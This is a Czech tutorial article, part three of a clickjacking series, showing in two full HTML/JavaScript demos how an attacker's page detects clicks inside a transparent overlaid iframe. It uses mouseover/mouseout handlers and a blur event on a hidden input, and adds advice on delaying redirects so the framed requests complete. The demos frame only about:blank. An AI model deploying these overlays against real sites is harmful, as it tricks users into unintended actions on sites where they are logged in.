Clickjacking (3)
Autor: .cCuMiNn. | 30.8.2012 |
Asi nejvíce omezující skutečností při použití clickjackingu je bezpečnostní politika Same Origin Policy, díky které nemůžeme zjišťovat výskyt kliknutí a jiných akcí uvnitř průhledného rámu. Nemůžeme proto adekvátně reagovat na v rámu uskutečněné akce. V tomto díle si ukážeme, že to nemusí být až tak úplně pravda.
Co bychom chtěli a ono to nejde
Pro útočníka by bylo nejpřínosnější, kdyby po uživatelském kliknutí do obsahu skrytého rámu mohl tuto akci zachytit a reagovat na ni odpovídající reakcí, například přechodem na jinou stránku, změnou přepínače, apd. V ideálním případě by se toho dalo dosáhnout jednoduchým přidáním atributu onClick k prvku IFRAME
- <iframe src="http://www..." onClick="reakce()"></iframe>
Uvedený příklad není ovšem právě kvůli omezení ze strany Same Origin Policy možné použít. Co ovšem je možné nad vloženým rámem zachytávat, jsou události mouseOver a mouseOut. Podíváme se tedy nejprve, jak je přidáním atributů onMouseOver a onMouseOut k prvku IFRAME možné vytvořit na své stránce prvek, který ač je umístěn pod rámem, dokáže reagovat na přejezd kurzoru. Následně stejných atributů využijeme také k vytvoření akce, která bude reagovat na kliknutí v rámu.
Ošetřujeme pozici kurzoru
Jistě se mnou budete souhlasit, že „klikatelný“ prvek na útočné webové stránce bude vypadat daleko přesvědčivěji, pokud bude dynamicky měnit svůj vzhled podle toho, zda je (nebo není) nad tímto prvkem umístěn kurzor. Pro demonstraci vložíme na stránku tlačítko, které překryjeme stejně velkým průhledným rámem a pro změnu vzhledu tlačítka po najetí kurzoru nad rám využijeme ovladačů událostí onMouseOver a onMouseOut prvku IFRAME.
- <html>
- <head></head>
- <body>
- <style>
- #invisible_ifrm {
- opacity: 0;
- overflow: hidden;
- position: absolute;
- width: 100px;
- height: 40px;
- left: 48%;
- top: 48%;
- }
- #btn {
- position: absolute;
- width: 100px;
- height: 40px;
- left: 48%;
- top: 48%;
- background: silver;
- }
- </style>
- <input type="button" value="Vstup" id="btn">
- <iframe
- src = "about:blank"
- id = "invisible_ifrm"
- onmouseout = "getElementById('btn').style.background='silver'"
- onmouseover = "getElementById('btn').style.background='grey'">
- </iframe>
- </body>
- </html>
Demonstrace: demo_clk3_1.html
Ošetřujeme kliknutí v rámu
Funkčnost dynamické změny vzhledu prvku po najetí kurzorem byla triviální. Jak však zjistit, zda došlo nad vloženým rámem ke kliknutí? Výskyt události Click nad rámem zjišťovat nemůžeme a budeme proto nuceni využít jistého hacku, který spočívá v ošetření události Blur jiného našeho prvku. K této události dochází vždy, když daný prvek ztratí focus. Do své stránky si proto vložíme například prvek INPUT, kterému pomocí ovladače události onMouseOver u rámu vždy přiřadíme focus ve chvíli, kdy najedeme kurzorem nad skrytý rám. Ve chvíli, kdy uživatel nad rámem klikne, dochází automaticky ke ztrátě tohoto focusu a k vyvolání události Blur, kterou u prvku dokážeme zachytit a patřičně na ni reagovat.
Abychom zabránili vykonání ovladače onBlur u pomocného inputu ve chvíli, kdy uživatel klikne na jiné místo webové stránky, než ve vloženém rámu, zavedli jsme si proměnou foc, která mění svou hodnotu podle toho, zda se kurzor právě nachází nad rámem nebo mimo něj.
- <html>
- <head></head>
- <body>
- <style>
- #invisible_ifrm {
- opacity: 0;
- overflow: hidden;
- position: absolute;
- width: 100px;
- height: 40px;
- left: 48%;
- top: 48%;
- }
- #btn {
- position: absolute;
- width: 100px;
- height: 40px;
- left: 48%;
- top: 48%;
- background: silver;
- }
- #btnfoc {
- position: absolute;
- left: -1000px;
- }
- #napis {
- position: absolute;
- z-index: 1;
- left: 48%;
- top: 48%;
- width: 100px;
- text-align: center;
- }
- </style>
- <script>
- var foc=0;
- function action() {
- if (foc==1) {
- document.getElementById('btndiv').innerHTML="<h1 id='napis'>OK</h2>";
- }
- }
- function mouse_over() {
- document.getElementById('btn').style.background='grey';
- foc=1;
- document.getElementById('btnfoc').focus();
- }
- function mouse_out() {
- document.getElementById('btn').style.background='silver';
- foc=0;
- }
- </script>
- <input type="button" id="btnfoc" onblur="action()">
- <div id="btndiv">
- <input type="button" value="Vstup" id="btn">
- </div>
- <iframe
- src = "about:blank"
- id = "invisible_ifrm"
- onmouseover = "mouse_over()"
- onmouseout = "mouse_out()">
- </iframe>
- </body>
- </html>
Demonstrace: demo_clk3_2.html
Poznámka: Jako akci po kliknutí v rámu nedoporučuji provádět okamžitý přechod na jinou webovou stránku. Mohlo by se totiž stát, že dojde k opuštění aktuální stránky dříve, než vložený rám odešle všechny požadované požadavky. Mnohem lepší je změnit dynamicky obsah aktuální webové stránky a průhledný rám v ní ponechat. V případě, že chcete stránku přesto opustit, je lepší volat přesměrování funkcí setTimeout s určitým časovým zpožděním.
Co nás čeká příště
Myslím si, že klikání máme už všichni dost a tak se v příštím dílu seriálu podíváme na možnosti, jak je s využitím rámů možné přimět uživatele k tomu, aby vyplnili a odeslali formulář takovým způsobem, který pro ně může mít velice nemilé následky.
Všechny díly seriálu
Clickjacking (1)Clickjacking (2)
Clickjacking (3)
Clickjacking (4)
Clickjacking (5)
Clickjacking (6)
Budeme potěšeni, pokud vás zaujme také reklamní nabídka
.Přihlášení | ||
| |||
.Infobox Nejnovější:
Články:
BugTrack: HackForum: Další služby: Na SOOM.cz je:
Článků: 991
Komentářů: 14 249 Aktualit: 1 861 Souborů: 151 WebForum: 49 235 Hardware: 38 Diskuze: 20 069 BugTrack: 4 412 Reg. uživatelů: 15 653 A proběhlo:
Zobraz. článků: 16 906 350
Staženo souborů: 1 341 928 Staženo dat: 862 259 MB Přístupy (hits): 188 747 156 | ||
| ||||
| |||
| |||
| |||
| ||||
| ||||
| ||||
| ||||
| ||||||||||||||||||||||||
